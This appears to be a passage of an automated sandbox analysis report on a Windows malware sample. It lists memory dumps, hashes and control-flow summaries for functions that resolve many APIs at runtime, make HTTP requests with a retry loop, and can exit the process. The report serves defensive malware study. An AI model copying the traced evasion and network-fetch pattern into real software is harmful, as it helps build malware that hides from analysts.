                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: abaf5480555a9bf7331650fa9a5bbcd0180de9f2ee12a649683b86a6c5122ec1
                          • Instruction ID: 2b6a8ffbba3985c023b497c69c69c83a45558257055455649e509b16d89d5e7f
                          • Opcode Fuzzy Hash: abaf5480555a9bf7331650fa9a5bbcd0180de9f2ee12a649683b86a6c5122ec1
                          • Instruction Fuzzy Hash: E3F04FB1944208ABC704DF98DD49BAEFBB8FB08712F10065AFA05A3680D77819048BA1
                          Function 00911160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 1667428b634bbc42c0fce042d9e9b701208fa8e89ddf6ad0da53f931e00ee73e
                          • Instruction ID: cfcc766b4acd3cbf5c972b3e2987b6b7a09e52c6fdb29d910c962bd965e9d6bf
                          • Opcode Fuzzy Hash: 1667428b634bbc42c0fce042d9e9b701208fa8e89ddf6ad0da53f931e00ee73e
                          • Instruction Fuzzy Hash: 73D05E7490430CEBCB00DFE0D8496DDBB78FB0C312F000699D90573340EE306881CAA6
                          Function 00929C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 929c10-929c1a 634 929c20-92a031 GetProcAddress * 43 633->634 635 92a036-92a0ca LoadLibraryA * 8 633->635 634->635 636 92a146-92a14d 635->636 637 92a0cc-92a141 GetProcAddress * 5 635->637 638 92a153-92a211 GetProcAddress * 8 636->638 639 92a216-92a21d 636->639 637->636 638->639 640 92a298-92a29f 639->640 641 92a21f-92a293 GetProcAddress * 5 639->641 642 92a337-92a33e 640->642 643 92a2a5-92a332 GetProcAddress * 6 640->643 641->640 644 92a344-92a41a GetProcAddress * 9 642->644 645 92a41f-92a426 642->645 643->642 644->645 646 92a4a2-92a4a9 645->646 647 92a428-92a49d GetProcAddress * 5 645->647 648 92a4ab-92a4d7 GetProcAddress * 2 646->648 649 92a4dc-92a4e3 646->649 647->646 648->649 650 92a515-92a51c 649->650 651 92a4e5-92a510 GetProcAddress * 2 649->651 652 92a612-92a619 650->652 653 92a522-92a60d GetProcAddress * 10 650->653 651->650 654 92a61b-92a678 GetProcAddress * 4 652->654 655 92a67d-92a684 652->655 653->652 654->655 656 92a686-92a699 GetProcAddress 655->656 657 92a69e-92a6a5 655->657 656->657 658 92a6a7-92a703 GetProcAddress * 4 657->658 659 92a708-92a709 657->659 658->659
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,01035730), ref: 00929C2D
                          • GetProcAddress.KERNEL32(74DD0000,01035910), ref: 00929C45
                          • GetProcAddress.KERNEL32(74DD0000,0104A858), ref: 00929C5E
                          • GetProcAddress.KERNEL32(74DD0000,0104A7F8), ref: 00929C76
                          • GetProcAddress.KERNEL32(74DD0000,0104A828), ref: 00929C8E
                          • GetProcAddress.KERNEL32(74DD0000,0104A840), ref: 00929CA7
                          • GetProcAddress.KERNEL32(74DD0000,0103CD10), ref: 00929CBF
                          • GetProcAddress.KERNEL32(74DD0000,0104EE78), ref: 00929CD7
                          • GetProcAddress.KERNEL32(74DD0000,0104F070), ref: 00929CF0
                          • GetProcAddress.KERNEL32(74DD0000,0104EDD0), ref: 00929D08
                          • GetProcAddress.KERNEL32(74DD0000,0104EFF8), ref: 00929D20
                          • GetProcAddress.KERNEL32(74DD0000,010357D0), ref: 00929D39
                          • GetProcAddress.KERNEL32(74DD0000,01035750), ref: 00929D51
                          • GetProcAddress.KERNEL32(74DD0000,01035930), ref: 00929D69
                          • GetProcAddress.KERNEL32(74DD0000,010356F0), ref: 00929D82
                          • GetProcAddress.KERNEL32(74DD0000,0104F088), ref: 00929D9A
                          • GetProcAddress.KERNEL32(74DD0000,0104EE00), ref: 00929DB2
                          • GetProcAddress.KERNEL32(74DD0000,0103CD88), ref: 00929DCB
                          • GetProcAddress.KERNEL32(74DD0000,01035950), ref: 00929DE3
                          • GetProcAddress.KERNEL32(74DD0000,0104F010), ref: 00929DFB
                          • GetProcAddress.KERNEL32(74DD0000,0104EE90), ref: 00929E14
                          • GetProcAddress.KERNEL32(74DD0000,0104F0A0), ref: 00929E2C
                          • GetProcAddress.KERNEL32(74DD0000,0104EFB0), ref: 00929E44
                          • GetProcAddress.KERNEL32(74DD0000,010359B0), ref: 00929E5D
                          • GetProcAddress.KERNEL32(74DD0000,0104F028), ref: 00929E75
                          • GetProcAddress.KERNEL32(74DD0000,0104EF80), ref: 00929E8D
                          • GetProcAddress.KERNEL32(74DD0000,0104F058), ref: 00929EA6
                          • GetProcAddress.KERNEL32(74DD0000,0104EEA8), ref: 00929EBE
                          • GetProcAddress.KERNEL32(74DD0000,0104EED8), ref: 00929ED6
                          • GetProcAddress.KERNEL32(74DD0000,0104EDB8), ref: 00929EEF
                          • GetProcAddress.KERNEL32(74DD0000,0104EEF0), ref: 00929F07
                          • GetProcAddress.KERNEL32(74DD0000,0104EFC8), ref: 00929F1F
                          • GetProcAddress.KERNEL32(74DD0000,0104EFE0), ref: 00929F38
                          • GetProcAddress.KERNEL32(74DD0000,0104B340), ref: 00929F50
                          • GetProcAddress.KERNEL32(74DD0000,0104F040), ref: 00929F68
                          • GetProcAddress.KERNEL32(74DD0000,0104EDE8), ref: 00929F81
                          • GetProcAddress.KERNEL32(74DD0000,010359D0), ref: 00929F99
                          • GetProcAddress.KERNEL32(74DD0000,0104EE18), ref: 00929FB1
                          • GetProcAddress.KERNEL32(74DD0000,01035690), ref: 00929FCA
                          • GetProcAddress.KERNEL32(74DD0000,0104EE30), ref: 00929FE2
                          • GetProcAddress.KERNEL32(74DD0000,0104EE60), ref: 00929FFA
                          • GetProcAddress.KERNEL32(74DD0000,010356B0), ref: 0092A013
                          • GetProcAddress.KERNEL32(74DD0000,01035B50), ref: 0092A02B
                          • LoadLibraryA.KERNEL32(0104EE48,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A03D
                          • LoadLibraryA.KERNEL32(0104EF20,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A04E
                          • LoadLibraryA.KERNEL32(0104EEC0,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A060
                          • LoadLibraryA.KERNEL32(0104EF08,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A072
                          • LoadLibraryA.KERNEL32(0104EF38,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A083
                          • LoadLibraryA.KERNEL32(0104EF50,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A095
                          • LoadLibraryA.KERNEL32(0104EF68,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A0A7
                          • LoadLibraryA.KERNEL32(0104EF98,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A0B8
                          • GetProcAddress.KERNEL32(75290000,01035D30), ref: 0092A0DA
                          • GetProcAddress.KERNEL32(75290000,0104F118), ref: 0092A0F2
                          • GetProcAddress.KERNEL32(75290000,01049F58), ref: 0092A10A
                          • GetProcAddress.KERNEL32(75290000,0104F358), ref: 0092A123
                          • GetProcAddress.KERNEL32(75290000,01035C30), ref: 0092A13B
                          • GetProcAddress.KERNEL32(734C0000,0103C900), ref: 0092A160
                          • GetProcAddress.KERNEL32(734C0000,01035D50), ref: 0092A179
                          • GetProcAddress.KERNEL32(734C0000,0103C608), ref: 0092A191
                          • GetProcAddress.KERNEL32(734C0000,0104F250), ref: 0092A1A9
                          • GetProcAddress.KERNEL32(734C0000,0104F1C0), ref: 0092A1C2
                          • GetProcAddress.KERNEL32(734C0000,01035C10), ref: 0092A1DA
                          • GetProcAddress.KERNEL32(734C0000,01035A90), ref: 0092A1F2
                          • GetProcAddress.KERNEL32(734C0000,0104F2E0), ref: 0092A20B
                          • GetProcAddress.KERNEL32(752C0000,01035D70), ref: 0092A22C
                          • GetProcAddress.KERNEL32(752C0000,01035DD0), ref: 0092A244
                          • GetProcAddress.KERNEL32(752C0000,0104F208), ref: 0092A25D
                          • GetProcAddress.KERNEL32(752C0000,0104F280), ref: 0092A275
                          • GetProcAddress.KERNEL32(752C0000,01035AB0), ref: 0092A28D
                          • GetProcAddress.KERNEL32(74EC0000,0103C7E8), ref: 0092A2B3
                          • GetProcAddress.KERNEL32(74EC0000,0103C6A8), ref: 0092A2CB
                          • GetProcAddress.KERNEL32(74EC0000,0104F298), ref: 0092A2E3
                          • GetProcAddress.KERNEL32(74EC0000,01035D90), ref: 0092A2FC
                          • GetProcAddress.KERNEL32(74EC0000,01035C50), ref: 0092A314
                          • GetProcAddress.KERNEL32(74EC0000,0103C950), ref: 0092A32C
                          • GetProcAddress.KERNEL32(75BD0000,0104F340), ref: 0092A352
                          • GetProcAddress.KERNEL32(75BD0000,01035AD0), ref: 0092A36A
                          • GetProcAddress.KERNEL32(75BD0000,01049F68), ref: 0092A382
                          • GetProcAddress.KERNEL32(75BD0000,0104F238), ref: 0092A39B
                          • GetProcAddress.KERNEL32(75BD0000,0104F268), ref: 0092A3B3
                          • GetProcAddress.KERNEL32(75BD0000,01035B70), ref: 0092A3CB
                          • GetProcAddress.KERNEL32(75BD0000,01035BD0), ref: 0092A3E4
                          • GetProcAddress.KERNEL32(75BD0000,0104F310), ref: 0092A3FC
                          • GetProcAddress.KERNEL32(75BD0000,0104F178), ref: 0092A414
                          • GetProcAddress.KERNEL32(75A70000,01035C90), ref: 0092A436
                          • GetProcAddress.KERNEL32(75A70000,0104F100), ref: 0092A44E
                          • GetProcAddress.KERNEL32(75A70000,0104F190), ref: 0092A466
                          • GetProcAddress.KERNEL32(75A70000,0104F148), ref: 0092A47F
                          • GetProcAddress.KERNEL32(75A70000,0104F370), ref: 0092A497
                          • GetProcAddress.KERNEL32(75450000,01035E10), ref: 0092A4B8
                          • GetProcAddress.KERNEL32(75450000,01035CF0), ref: 0092A4D1
                          • GetProcAddress.KERNEL32(75DA0000,01035DB0), ref: 0092A4F2
                          • GetProcAddress.KERNEL32(75DA0000,0104F130), ref: 0092A50A
                          • GetProcAddress.KERNEL32(6F060000,01035DF0), ref: 0092A530
                          • GetProcAddress.KERNEL32(6F060000,01035E30), ref: 0092A548
                          • GetProcAddress.KERNEL32(6F060000,01035AF0), ref: 0092A560
                          • GetProcAddress.KERNEL32(6F060000,0104F2B0), ref: 0092A579
                          • GetProcAddress.KERNEL32(6F060000,01035B90), ref: 0092A591
                          • GetProcAddress.KERNEL32(6F060000,01035C70), ref: 0092A5A9
                          • GetProcAddress.KERNEL32(6F060000,01035CB0), ref: 0092A5C2
                          • GetProcAddress.KERNEL32(6F060000,01035CD0), ref: 0092A5DA
                          • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0092A5F1
                          • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0092A607
                          • GetProcAddress.KERNEL32(75AF0000,0104F1D8), ref: 0092A629
                          • GetProcAddress.KERNEL32(75AF0000,0104A088), ref: 0092A641
                          • GetProcAddress.KERNEL32(75AF0000,0104F2C8), ref: 0092A659
                          • GetProcAddress.KERNEL32(75AF0000,0104F160), ref: 0092A672
                          • GetProcAddress.KERNEL32(75D90000,01035B10), ref: 0092A693
                          • GetProcAddress.KERNEL32(6CFD0000,0104F220), ref: 0092A6B4
                          • GetProcAddress.KERNEL32(6CFD0000,01035B30), ref: 0092A6CD
                          • GetProcAddress.KERNEL32(6CFD0000,0104F1A8), ref: 0092A6E5
                          • GetProcAddress.KERNEL32(6CFD0000,0104F388), ref: 0092A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 2046b1f8efdfa64fe08eb910c540718ae06dc2f30a44e56a1bb681f435a33450
                          • Instruction ID: e2b858503f906f26305b8b19afc1d2b9bb76853b5df5ebbe271c0f710587cd77
                          • Opcode Fuzzy Hash: 2046b1f8efdfa64fe08eb910c540718ae06dc2f30a44e56a1bb681f435a33450
                          • Instruction Fuzzy Hash: E16219B5510300AFD344DFA8ED98B663BF9F74C603B14879AA709E3264DE39A841DB13
                          Function 00916280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 916280-91630b call 92a7a0 call 9147b0 call 92a740 InternetOpenA StrCmpCA 1040 916314-916318 1033->1040 1041 91630d 1033->1041 1042 916509-916525 call 92a7a0 call 92a800 * 2 1040->1042 1043 91631e-916342 InternetConnectA 1040->1043 1041->1040 1061 916528-91652d 1042->1061 1044 916348-91634c 1043->1044 1045 9164ff-916503 InternetCloseHandle 1043->1045 1047 91635a 1044->1047 1048 91634e-916358 1044->1048 1045->1042 1050 916364-916392 HttpOpenRequestA 1047->1050 1048->1050 1053 9164f5-9164f9 InternetCloseHandle 1050->1053 1054 916398-91639c 1050->1054 1053->1045 1056 9163c5-916405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 91639e-9163bf InternetSetOptionA 1054->1057 1059 916407-916427 call 92a740 call 92a800 * 2 1056->1059 1060 91642c-91644b call 928940 1056->1060 1057->1056 1059->1061 1066 9164c9-9164e9 call 92a740 call 92a800 * 2 1060->1066 1067 91644d-916454 1060->1067 1066->1061 1071 9164c7-9164ef InternetCloseHandle 1067->1071 1072 916456-916480 InternetReadFile 1067->1072 1071->1053 1076 916482-916489 1072->1076 1077 91648b 1072->1077 1076->1077 1080 91648d-9164c5 call 92a9b0 call 92a8a0 call 92a800 1076->1080 1077->1071 1080->1072
                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                            • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • InternetOpenA.WININET(00930DFE,00000001,00000000,00000000,00000000), ref: 009162E1
                          • StrCmpCA.SHLWAPI(?,01050A00), ref: 00916303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00916335
                          • HttpOpenRequestA.WININET(00000000,GET,?,010500C8,00000000,00000000,00400100,00000000), ref: 00916385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009163BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009163D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009163FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0091646D
                          • InternetCloseHandle.WININET(00000000), ref: 009164EF
                          • InternetCloseHandle.WININET(00000000), ref: 009164F9
                          • InternetCloseHandle.WININET(00000000), ref: 00916503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 871e56dd5d06db53c693b9cdb1055ebacd1cdee0100909d6f5c2097972a5421e
                          • Instruction ID: 99a27a562cf7d962d8201b428589f20fe9ce1602b79b55104f824987cf9c4c86
                          • Opcode Fuzzy Hash: 871e56dd5d06db53c693b9cdb1055ebacd1cdee0100909d6f5c2097972a5421e
                          • Instruction Fuzzy Hash: A1713C71E00318ABDB24DFA0DC59BEEB778BB48701F108598F50AAB1D4DBB46A85CF51
                          Function 00925510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 925510-925577 call 925ad0 call 92a820 * 3 call 92a740 * 4 1106 92557c-925583 1090->1106 1107 9255d7-92564c call 92a740 * 2 call 911590 call 9252c0 call 92a8a0 call 92a800 call 92aad0 StrCmpCA 1106->1107 1108 925585-9255b6 call 92a820 call 92a7a0 call 911590 call 9251f0 1106->1108 1133 925693-9256a9 call 92aad0 StrCmpCA 1107->1133 1137 92564e-92568e call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1107->1137 1124 9255bb-9255d2 call 92a8a0 call 92a800 1108->1124 1124->1133 1140 9256af-9256b6 1133->1140 1141 9257dc-925844 call 92a8a0 call 92a820 * 2 call 911670 call 92a800 * 4 call 926560 call 911550 1133->1141 1137->1133 1144 9257da-92585f call 92aad0 StrCmpCA 1140->1144 1145 9256bc-9256c3 1140->1145 1272 925ac3-925ac6 1141->1272 1165 925991-9259f9 call 92a8a0 call 92a820 * 2 call 911670 call 92a800 * 4 call 926560 call 911550 1144->1165 1166 925865-92586c 1144->1166 1146 9256c5-925719 call 92a820 call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1145->1146 1147 92571e-925793 call 92a740 * 2 call 911590 call 9252c0 call 92a8a0 call 92a800 call 92aad0 StrCmpCA 1145->1147 1146->1144 1147->1144 1250 925795-9257d5 call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1147->1250 1165->1272 1167 925872-925879 1166->1167 1168 92598f-925a14 call 92aad0 StrCmpCA 1166->1168 1174 9258d3-925948 call 92a740 * 2 call 911590 call 9252c0 call 92a8a0 call 92a800 call 92aad0 StrCmpCA 1167->1174 1175 92587b-9258ce call 92a820 call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1167->1175 1197 925a16-925a21 Sleep 1168->1197 1198 925a28-925a91 call 92a8a0 call 92a820 * 2 call 911670 call 92a800 * 4 call 926560 call 911550 1168->1198 1174->1168 1276 92594a-92598a call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1174->1276 1175->1168 1197->1106 1198->1272 1250->1144 1276->1168
                          APIs
                            • Part of subcall function 0092A820: lstrlen.KERNEL32(00914F05,?,?,00914F05,00930DDE), ref: 0092A82B
                            • Part of subcall function 0092A820: lstrcpy.KERNEL32(00930DDE,00000000), ref: 0092A885
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009256A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925857
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009251F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925228
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 009252C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925318
                            • Part of subcall function 009252C0: lstrlen.KERNEL32(00000000), ref: 0092532F
                            • Part of subcall function 009252C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00925364
                            • Part of subcall function 009252C0: lstrlen.KERNEL32(00000000), ref: 00925383
                            • Part of subcall function 009252C0: lstrlen.KERNEL32(00000000), ref: 009253AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0092578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00925A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 00f499ffa02e44a24d9e6a4ec6efeec0ed71596fbf579aeb29e23f3c906bcf93
                          • Instruction ID: 68a9b22095710ad11ab00d269c7d971b0b49afc19c9919ba15954a839c274328
                          • Opcode Fuzzy Hash: 00f499ffa02e44a24d9e6a4ec6efeec0ed71596fbf579aeb29e23f3c906bcf93
                          • Instruction Fuzzy Hash: 9DE11072910218ABCB14FBA0FC56FED733DAF94300F508568F5066719AEF346A49CB96
                          Function 009217A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 9217a0-9217cd call 92aad0 StrCmpCA 1304 9217d7-9217f1 call 92aad0 1301->1304 1305 9217cf-9217d1 ExitProcess 1301->1305 1309 9217f4-9217f8 1304->1309 1310 9219c2-9219cd call 92a800 1309->1310 1311 9217fe-921811 1309->1311 1313 921817-92181a 1311->1313 1314 92199e-9219bd 1311->1314 1316 921932-921943 StrCmpCA 1313->1316 1317 921913-921924 StrCmpCA 1313->1317 1318 921970-921981 StrCmpCA 1313->1318 1319 9218f1-921902 StrCmpCA 1313->1319 1320 921951-921962 StrCmpCA 1313->1320 1321 921835-921844 call 92a820 1313->1321 1322 92187f-921890 StrCmpCA 1313->1322 1323 92185d-92186e StrCmpCA 1313->1323 1324 921821-921830 call 92a820 1313->1324 1325 921849-921858 call 92a820 1313->1325 1326 9218cf-9218e0 StrCmpCA 1313->1326 1327 92198f-921999 call 92a820 1313->1327 1328 9218ad-9218be StrCmpCA 1313->1328 1314->1309 1335 921945-921948 1316->1335 1336 92194f 1316->1336 1333 921930 1317->1333 1334 921926-921929 1317->1334 1340 921983-921986 1318->1340 1341 92198d 1318->1341 1331 921904-921907 1319->1331 1332 92190e 1319->1332 1337 921964-921967 1320->1337 1338 92196e 1320->1338 1321->1314 1348 921892-92189c 1322->1348 1349 92189e-9218a1 1322->1349 1346 921870-921873 1323->1346 1347 92187a 1323->1347 1324->1314 1325->1314 1329 9218e2-9218e5 1326->1329 1330 9218ec 1326->1330 